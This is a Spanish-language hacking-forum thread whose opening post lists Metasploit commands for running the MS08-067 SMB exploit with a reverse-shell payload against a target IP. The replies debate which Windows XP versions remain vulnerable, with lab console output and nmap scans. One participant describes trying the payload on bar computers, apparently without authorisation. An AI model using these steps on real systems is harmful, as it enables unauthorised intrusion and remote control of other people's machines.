Underc0de

[In]Seguridad Informática => Bugs y Exploits => Mensaje iniciado por: Payasako en Febrero 17, 2015, 06:06:43 PM

Título: Metasploit | Penetrar una pc. [Exploit]
Publicado por: Payasako en Febrero 17, 2015, 06:06:43 PM
(http://1.bp.blogspot.com/-D8aGpvFRWeA/UZfrMTeNRKI/AAAAAAAABKw/N5v3Dky5t-Q/s1600/metasploit.png)
Metasploit | Penetrar una pc.


En este post os pondre un exploit , que sirve para penetrar en una pc.  Me explico mejor paso a paso. Primero teneis que abrir la consola metasploit , si no la teneis descargarla aqui: www.metasploit.com/download/

Bueno ya tenemos abierta la consola pues ahora pondremos el exploit que queremos usar en este caso es netapi:
Citaruse exploit/windows/smb/ms08_067_netapi

Le damos enter y seguimos , ya tenemos el exploit pues procederemos a decirle a la consola que qué dirección IP queremos atacar o penetrar en este caso metemos este codigo:
Citarset RHOST 000.000.000.000 <- En 000.000.000.000 pondremos la IP a la que queremos atacar.

Ahora meteremos el payload que sera como una shell:
Citarset payload windows/shell/reverse_tcp

Vamos bien , ahora le tenemos que decir a metasploit quien somos pues para eso usaremos el comando:
Citarset LHOST 000.000.000.000 <- En 000.000.000.000 pondremos nuestra IP

Y ahora mandaremos el exploit con un simple comando:
Citarexploit

Bueno ya dejamos que cargue y eso , y una vez con acceso pues podemos poner help y te saldran muchos comandos y podras controlar la pc que pusiste. Quiero avisar que este exploit solo sirve para que la pc "víctima" tenga el puerto "3555" abierto.

Saludos :)
Título: Re:Metasploit | Penetrar una pc. [Exploit]
Publicado por: 0v3r_c0d3 en Agosto 26, 2015, 11:50:18 PM
Gracias  :) añado que no es detectable por el antivirus pero si esta el firewall activo no puede funcionar, habría que usar otro método.
Título: Re:Metasploit | Penetrar una pc. [Exploit]
Publicado por: q3rv0 en Agosto 27, 2015, 12:03:55 AM
CitarQuiero avisar que este exploit solo sirve para que la pc "víctima" tenga el puerto "3555" abierto.

El puerto 445.
Título: Re:Metasploit | Penetrar una pc. [Exploit]
Publicado por: rand0m en Agosto 28, 2015, 06:25:20 AM
Yo quisiera añadir también que esta vulnerabilidad sólo afecta a Windows XP SP1. La actualización a SP2 ya corrige el fallo.
Este exploit es de la prehistoria. ¿En serio esperáis tener resultados con él? Salieron muchísimos parches desde entonces.
Título: Re:Metasploit | Penetrar una pc. [Exploit]
Publicado por: MagoAstral en Agosto 28, 2015, 08:57:41 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Yo quisiera añadir también que esta vulnerabilidad sólo afecta a Windows XP SP1. La actualización a SP2 ya corrige el fallo.
Este exploit es de la prehistoria. ¿En serio esperáis tener resultados con él? Salieron muchísimos parches desde entonces.
Lamento decepcionarte pero el exploit no sólo afecta al service pack 1 de Windows XP. Si dedicas 2 minutos a buscar información sobre dicho exploit en la página principal de rapid7 (http://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi (http://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi)) podrás ver que afecta desde el SP1 hasta el SP3 pasando por el SP2 además de Windows 2000 (Universal)  y Windows 2003 (SP1 y SP2). Aclarados estos fallos procederé a contestar a tu segunda inquietud. Cualquier auditor de seguridad lloraría hay muchísimos software que por contrato con la empresa obligan a tener el Windows XP en un service pack desactualizado, en caso contrario no ofertarían su soporte por consiguiente son un buen blanco.
Si tienes más dudas te recomiendo que mires estadísticas!
Salu2
Título: Re:Metasploit | Penetrar una pc. [Exploit]
Publicado por: rand0m en Agosto 28, 2015, 09:41:04 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Lamento decepcionarte pero el exploit no sólo afecta al service pack 1 de Windows XP. Si dedicas 2 minutos a buscar información sobre dicho exploit en la página principal de rapid7 (http://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi (http://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi)) podrás ver que afecta desde el SP1 hasta el SP3 pasando por el SP2 además de Windows 2000 (Universal)  y Windows 2003 (SP1 y SP2).
No sé, chico, pero tus estadísticas se desmienten en el laboratorio.
(http://anonpix.com/images/2015/08/28/0fImb.png)
Para más dudas te recomiendo que montes un hacklab y pruebes las cosas.
Título: Re:Metasploit | Penetrar una pc. [Exploit]
Publicado por: MagoAstral en Agosto 28, 2015, 10:37:17 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Lamento decepcionarte pero el exploit no sólo afecta al service pack 1 de Windows XP. Si dedicas 2 minutos a buscar información sobre dicho exploit en la página principal de rapid7 (http://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi (http://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi)) podrás ver que afecta desde el SP1 hasta el SP3 pasando por el SP2 además de Windows 2000 (Universal)  y Windows 2003 (SP1 y SP2).
No sé, chico, pero tus estadísticas se desmienten en el laboratorio.
(http://anonpix.com/images/2015/08/28/0fImb.png)
Para más dudas te recomiendo que montes un hacklab y pruebes las cosas.
Aquí tienes una prueba de concepto con el mismo exploit que usted ha intentado utilizar:

(https://www.youtube.com/watch?v=q0Q2lzqygm8 (https://www.youtube.com/watch?v=q0Q2lzqygm8)). Le recomendaría leer algún tutorial donde expliquen como instalar una máquina virtual en un entorno controlado.
Saludos!
Título: Re:Metasploit | Penetrar una pc. [Exploit]
Publicado por: rand0m en Agosto 28, 2015, 11:02:18 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Aquí tienes una prueba de concepto con el mismo exploit que usted ha intentado utilizar:
1º- Eso no es una prueba de concepto. Si quieres llamarlo de alguna manera llámalo Demo.
2º - Sí, podemos preparar un entorno Windows para que sea vulnerable, pero por defecto no lo es.
3º- ¿A qué viene lo de los entornos virtuales? ¿Eres tonto o qué te pasa? Estas capturas son de máquinas corriendo en VMware. ¿A qué viene eso?

--EDIT--
No busques vídeos de terceros. Prueba lo que dices, como hice yo.
Título: Re:Metasploit | Penetrar una pc. [Exploit]
Publicado por: MagoAstral en Agosto 28, 2015, 11:35:17 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Aquí tienes una prueba de concepto con el mismo exploit que usted ha intentado utilizar:
1º- Eso no es una prueba de concepto. Si quieres llamarlo de alguna manera llámalo Demo.
2º - Sí, podemos preparar un entorno Windows para que sea vulnerable, pero por defecto no lo es.
3º- ¿A qué viene lo de los entornos virtuales? ¿Eres tonto o qué te pasa? Estas capturas son de máquinas corriendo en VMware. ¿A qué viene eso?

--EDIT--
No busques vídeos de terceros. Prueba lo que dices, como hice yo.
1º https://es.wikipedia.org/wiki/Prueba_de_concepto (https://es.wikipedia.org/wiki/Prueba_de_concepto) Una prueba de concepto o PoC (por sus siglas en inglés) es una implementación, a menudo resumida o incompleta, de un método o de una idea
2º Acabo de montar un windows xp sp3, desactivado el firewall y explotado correctamente la vulnerabilidad. ¿Magia? Claro no recordaba que era un Mago...
3º Lo primero es que no voy a seguir discutiendo con un necio como es usted, que carece de argumentos y recurre al insulto. Ya no me gustaba esos aires de superioridad, de mirar por encima del hombro y criticar el trabajo de los demás con el tema de los vídeos pero decidí no intervenir. Como asumo que no eras el más rápido de tu clase en comprensión lectora te aclararé, cuando me refería a que mirases un tutorial es porque alomejor estás cometiendo alguna errata en tu laboratorio y ahí subyace el problema de que no puedas realizar tus pruebas de concepto, demostraciones, etc... como quieras llamarlo.
Te dejo unas capturas:
(http://i.imgur.com/k7GXZIY.jpg) (http://i.imgur.com/k7GXZIY.jpg (http://i.imgur.com/k7GXZIY.jpg))
(http://i.imgur.com/vzJqb91.jpg) (http://i.imgur.com/vzJqb91.jpg (http://i.imgur.com/vzJqb91.jpg))
Saludos compañero!
Título: Re:Metasploit | Penetrar una pc. [Exploit]
Publicado por: ANTRAX en Agosto 28, 2015, 04:44:13 PM
Chicos, me parece genial que se arme debate. Pero haganlo siempre sin insultar.
Los foros estan hechos para debatir, cuidemos la forma nada mas.

Saludos!
ANTRAX
Título: Re:Metasploit | Penetrar una pc. [Exploit]
Publicado por: rand0m en Agosto 28, 2015, 05:08:23 PM
Bueno, visto lo visto he creado una máquina virtual nueva y le he instalado Windows XP SP3, desactivando las actualizaciones automáticas durante la instalación. Los únicos clicks que se hicieron en esta nueva máquina fueron para acceder al Panel de Control y desactivar el firewall.
(http://anonpix.com/images/2015/08/28/jMot.png)
Al lanzar el exploit no obtenemos un resultado satisfactorio, por eso compruebo la conectividad de la siguiente manera:
Ambas pruebas funcionan, por lo que sabemos que la máquina con Kali se comunica correctamente con la máquina Windows y viceversa. Además, por si acaso, me aseguré de que Windows puede realizar conexiones salientes al puerto 4444.
¿Qué ocurre, entonces? Que las instalaciones difieren. Mientras mi disco de Windows instala un sistema parcheado el que utilizó para el ejemplo MagoAstral no instaló tal parche.
Y de ahí que ambos tuviéramos razón: Windows XP SP3 puede ser vulnerable tras la instalación si lo instalamos desde una versión sin parchear. De todas formas los usuarios no suelen desactivar las actualizaciones automáticas, así que si ya es poco probable encontrarnos frente a un WinXP (Sin soporte por parte de M$), menos probable aún será que sea vulnerable a este exploit.
Título: Re:Metasploit | Penetrar una pc. [Exploit]
Publicado por: q3rv0 en Agosto 28, 2015, 05:16:14 PM
@rand0m (https://underc0de.org/foro/index.php?action=profile;u=44477) al parecer lo que esta andando mal es el payload no el exploit, proba con alguna shell inversa como windows/meterpreter/reverse_tcp.

Adjunto: http://jamesnesta.blogspot.com.ar/2014/02/metasploit-ms08-067-getting-stuck-at.html
Título: Re:Metasploit | Penetrar una pc. [Exploit]
Publicado por: Gabriela en Agosto 28, 2015, 05:38:25 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Chicos, me parece genial que se arme debate. Pero haganlo siempre sin insultar.
Los foros estan hechos para debatir, cuidemos la forma nada mas.

Saludos!
ANTRAX

Foro, según la tercera acepción de la RAE:

Citar3. m. Reunión para discutir asuntos de interés actual ante un auditorio que a veces interviene en la discusión.

Precisamente, este tipo de intercambio es lo que dinamizan, enriquecen y permiten aprender. No dejéis de hacerlo, siempre guardando las formas (como dijo ANTRAX) que  -todos- son aportes sumamente interesantes.

Gabi.
Título: Re:Metasploit | Penetrar una pc. [Exploit]
Publicado por: rand0m en Agosto 28, 2015, 06:09:29 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
@rand0m (https://underc0de.org/foro/index.php?action=profile;u=44477) al parecer lo que esta andando mal es el payload no el exploit, proba con alguna shell inversa como windows/meterpreter/reverse_tcp.
En el primer intento que hice fue el que intenté utilizar. Acabo de usarlo contra la máquina nueva y sigue sin dar resultado.

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.17     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: , , seh, thread, process, none)
   LHOST     192.168.1.14     yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

Partiendo de aquí hacemos cuantos intentos queramos, que el resultado es el mismo.
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.14:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.14
LHOST => 192.168.1.14
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.14:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
msf exploit(ms08_067_netapi) > set payload windows/shell/bind_tcp
payload => windows/shell/bind_tcp
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...

No sé si es que estoy haciendo algo mal (A lo que agradecería que alguien arrojase algo de luz) o es que realmente el Windows no es vulnerable, como venía diciendo desde el principio.
Título: Re:Metasploit | Penetrar una pc. [Exploit]
Publicado por: rand0m en Agosto 29, 2015, 06:58:46 AM
Me respondo a mí mismo para plantear una respuesta:
CitarOtra hipótesis es que tengas configuradas una políticas de iptables en tu kali de manera que no permite la conexión porque cuando sale el attempting to trigger the vulnerability indica que el meterpreter se ejecuta pero lanza un time out. Puedes probar a cambiar el payload por un bind_tcp.
Otro problema como tu dices sería la red normalmente la gente tiene problema al dejarlo en NAT pero como mencionaste anteriormente la tienes en adaptador puente ¿Has seleccionado replicar el estado?
De primeras el estado de la tarjeta no estaba replicado. Marqué la casilla en la configuración de VMware y arranqué de nuevo. Bien, empezando por las iptables, éstas están desactivadas.
root@KaliSana:/home/rand0m# iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         

He probado a pasarle un scan de vulnerabilidades con nmap y éste es el resultado.
Service Info: OS: Windows XP; CPE: cpe:/o:microsoft:windows_xp

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-check-vulns:
|   MS08-067: NOT VULNERABLE
|   Conficker: Likely CLEAN
|   SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
|   MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_  MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
|_smb-vuln-ms10-054: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)

TRACEROUTE
HOP RTT     ADDRESS
1   0.51 ms x-c77d82deb3b94.home (192.168.1.17)

Y como llevo intentando desde ayer el exploit sigue sin funcionar.
(http://anonpix.com/images/2015/08/29/hFtzr.png)
Sigo afirmando, convencido a un 90%, que mi CD de instalación instaló un Windows XP SP3 parcheado.
Aunque tampoco os calléis. ¡El debate está abierto y más vivo que nunca!
Título: Re:Metasploit | Penetrar una pc. [Exploit]
Publicado por: MagoAstral en Agosto 29, 2015, 10:41:07 AM
Por alguna extraña razón (puede que sea un parche o puede que no) tu samba no permite la interactuación NT_STATUS_ACCESS_DENIED podría ser que estuvieran cacheadas las credenciales o algún otro problema de la misma índole pero lo que me extraña es que no comprueba la integridad de exploit ms08_067. Prueba a ejecutar un "check" y veamos que información te devuelve!
Otra cosa es que si podrías pasar el checksum SHA1 de tu ISO a ver si podemos acortar las rutas de solución ;)
Saludos
Título: Re:Metasploit | Penetrar una pc. [Exploit]
Publicado por: rand0m en Agosto 29, 2015, 11:13:48 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Por alguna extraña razón (puede que sea un parche o puede que no) tu samba no permite la interactuación NT_STATUS_ACCESS_DENIED
Hagamos hincapié en que está recién instalado, con todos los valores por defecto excepto el cortafuegos.
Los checks de metasploit dicen que el objetivo no es vulnerable.
Al pie de foto está el SHA1 de la imagen ISO.
(http://anonpix.com/images/2015/08/29/DIUpZ.png)
Título: Re:Metasploit | Penetrar una pc. [Exploit]
Publicado por: MagoAstral en Agosto 29, 2015, 11:52:24 AM
Es que tu has descargado una versión de 2013, tienes que descargarte una iso original no una que haya sido alterada.
Prueba con esta: https://mega.nz/#!JtMkHYhR!IkaABqBsGrIBCXN8OqPqrQL77lfLmswkNU4JVoLpa00
Saludos!
Título: Re:Metasploit | Penetrar una pc. [Exploit]
Publicado por: rand0m en Agosto 29, 2015, 12:00:11 PM
Usé el torrent que más actividad tenía porque entiendo que es el que más distribuido está.

La gente que usa Windows se descarga versiones con drivers SATA (¿Alguen aquí todavía usa discos PATA?). Los que instalan versiones de Windows oficiales porque así lo tienen contratado en su empresa (O lo que sea) no lo mantendrán desactualizado. Creo que en esto estaremos todos de acuerdo.

Insisto: Este exploit tuvo su época de oro, pero fue hace más de 5 años. Aún así estoy descargando la ISO que dices y voy a buscar (Si no es ésta), la última versión OEM de Windows XP.
Título: Re:Metasploit | Penetrar una pc. [Exploit]
Publicado por: Snifer en Agosto 29, 2015, 01:02:42 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Usé el torrent que más actividad tenía porque entiendo que es el que más distribuido está.

La gente que usa Windows se descarga versiones con drivers SATA (¿Alguen aquí todavía usa discos PATA?). Los que instalan versiones de Windows oficiales porque así lo tienen contratado en su empresa (O lo que sea) no lo mantendrán desactualizado. Creo que en esto estaremos todos de acuerdo.

Aquí estas equivocado parcialmente en Bolivia lastimosamente tengo que decirlo ni contando con licencias hasta ahora siguien siendo vulnerables se llega a tocar hasta las puertas en su totalidad, todo depende de la cultura de manejo de parches lo cual recae en los encargados de TI.

Regards,
Snifer
Título: Re:Metasploit | Penetrar una pc. [Exploit]
Publicado por: gto en Septiembre 13, 2015, 12:43:18 AM
Buenas, no soy de comentar mucho pero me gusto la argumentación y quería aportar (nada tecnico) que soy de Rosario Argentina y de hecho he podido comprobar lastimosamente que muuuuuuchos bares de mi ciudad siguen con maquinas con xp ... he probado algunas veces con este payload de msf y de hecho nunca encontré un xp sin parchear, osea, mi experiencia me dice que hay xps todavia dando vuelta pero al menos yo no he visto que el payload funcione con regularidad.

Saludos y lindo debate  ;)
Título: Re:Metasploit | Penetrar una pc. [Exploit]
Publicado por: rand0m en Septiembre 13, 2015, 04:49:17 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
he podido comprobar lastimosamente que muuuuuuchos bares de mi ciudad siguen con maquinas con xp
Oye, pues no sé qué decirte. Windows XP me parece un gran sistema. Cuando me encuentro con un sistema 32bit que no correrá juegos con DirectX10/11 procuro instalarle un XP.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Saludos y lindo debate  ;)
Gracias por participar. La verdad es que ahora tengo tantas ISOs para probar (Lo que requiere instalarlas) que dejé aparcada la temática de este post precisamente por lo que comentas tú: Es raro que este exploit funcione into de wild (En un equipo que te encuentres por ahí).